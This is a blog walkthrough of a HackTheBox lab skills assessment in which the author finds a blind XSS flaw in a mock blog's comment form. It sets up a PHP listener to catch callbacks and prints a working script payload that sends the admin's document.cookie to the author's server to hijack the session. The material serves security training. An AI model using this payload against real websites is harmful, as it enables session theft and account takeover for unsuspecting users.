HackTheBox - Cross-Site Scripting (XSS) - Skills Assessment Walkthrough

Ido AbramovIdo Abramov
2 min read

Scenario

We are performing a Web Application Penetration Testing task for a company that hired you, which just released their new Security Blog. In our Web Application Penetration Testing plan, we reached the part where you must test the web application against Cross-Site Scripting vulnerabilities (XSS).

Our target is to use XSS for session hijacking to steal the victim’s cookie.

Walkthrough

First, we will enter the target website:

We will notice that there is only one blog post:

The site allows users to submit ideas and feedback, which will only be displayed after receiving admin approval.

Scroll down and you’ll see that we can write a comment. The input fields include comment, name, email and website. Let’s try it:

We can see our comment is waiting for approval:

Now, since we have a few fields that might be vulnerable to XSS injection, we need to find out which ones are actually vulnerable.

The type of XSS we are using is called Blind XSS, as we are unable to see the output or verify which payload will successfully execute. Therefore, we need a form of feedback to confirm that the XSS payload has been executed. To accomplish this, we will set up a server and use XSS payloads that trigger a request to our server when they execute in the admin’s browser.

To do this, we'll set up a local server. Here, I will create a PHP server listening for incoming requests on port 81:

mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:81

The server is now listening for incoming requests.

Next, we will insert XSS payloads into each field. To determine which ones are vulnerable, we will fetch different sources for each field in the format of http://<SERVER_IP>:<PORT>/<FIELD_NAME>.

After we post the comment, we can see that on our server:

This means the website field is vulnerable to XSS injection

Now that we have identified the field vulnerable to XSS, we can set a payload to steal the admin’s cookie.

We will use the following payload and insert it into the website field:

<script>new Image().src='http://10.10.14.242:81/?c='+document.cookie</script>

Then, we can see the following received on our server:

We successfully captured the admin’s cookie, and we can also see the flag 😉

0
Subscribe to my newsletter

Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.

XSSCBBHcross site scriptinghack-the-boxHTB Writeuphtb#HackTheBoxWeb App Security#WebAppSecurity

Written by

Ido Abramov
Ido Abramov